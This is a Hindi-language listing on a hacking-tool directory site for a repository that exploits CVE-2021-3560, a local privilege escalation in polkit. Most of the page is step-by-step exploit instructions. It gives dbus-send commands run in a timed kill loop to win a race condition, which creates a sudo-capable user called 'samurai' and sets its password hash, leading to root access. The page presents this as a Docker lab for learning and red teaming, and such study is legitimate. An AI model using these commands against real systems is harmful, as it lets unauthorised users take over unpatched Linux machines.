Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation — CVE-2021-3560 (Polkit विशेषाधिकार वृद्धि) के लिए Docker-आधारित शोषण, dbus-send में एक रेस कंडीशन के माध्यम से sudo उपयोगकर्ता बनाने के चरण-दर-चरण निर्देशों के साथ। | Kitploit
उपकरण/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

CVE-2021-3560 (Polkit विशेषाधिकार वृद्धि) के लिए Docker-आधारित शोषण, dbus-send में एक रेस कंडीशन के माध्यम से sudo उपयोगकर्ता बनाने के चरण-दर-चरण निर्देशों के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-3560-Polkit-विशेषाधिकार-वृद्धि

द्वारा Mark, Qingchen Yu कंटेनर बनाने के लिए

root@kitploit:~
docker build -t <image tag of your choice> .

कंटेनर चलाने के लिए

root@kitploit:~
docker run -it <image tag name>
  1. start.sh से शुरू करें

  2. माप निष्पादन समय: ध्यान दें 'real' समय और उसका आधा गणना करें।

    root@kitploit:~
    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. sudo विशेषाधिकारों वाला उपयोगकर्ता बनाएँ: X.XXX को ऊपर दिए गए 'real' समय के आधे से बदलें क्योंकि हम प्रक्रिया को बीच में बाधित करना चाहते हैं यह कमांड 10000 बार के लूप के रूप में चलेगी आपको यह चरण कई बार चलाने की आवश्यकता हो सकती है

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. उपयोगकर्ता निर्माण की जाँच करें id samurai इसे samurai उपयोगकर्ता के अस्तित्व और उसकी अनुमतियाँ दिखानी चाहिए। यदि नहीं, तो चरण 2 फिर से चलाएँ।

  5. पासवर्ड हैश उत्पन्न करें: इस मामले में, पासवर्ड 'iamsamurai' होगा उत्पन्न हैश पर ध्यान दें।

    root@kitploit:~
    openssl passwd -5 iamsamurai
    
  6. नए उपयोगकर्ता के लिए पासवर्ड सेट करें: X.XXX को नींद की अवधि से और पासवर्ड हैश को चरण 4 के हैश से बदलें। UUUU को 'samurai' के उपयोगकर्ता आईडी से बदलें।

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. चरण 4 में बनाए गए पासवर्ड से नए उपयोगकर्ता पर स्विच करें। su - samurai

    अब आप 'sudo इस उपयोगकर्ता के साथ' का उपयोग कर पाएंगे।

टूल डाउनलोड करें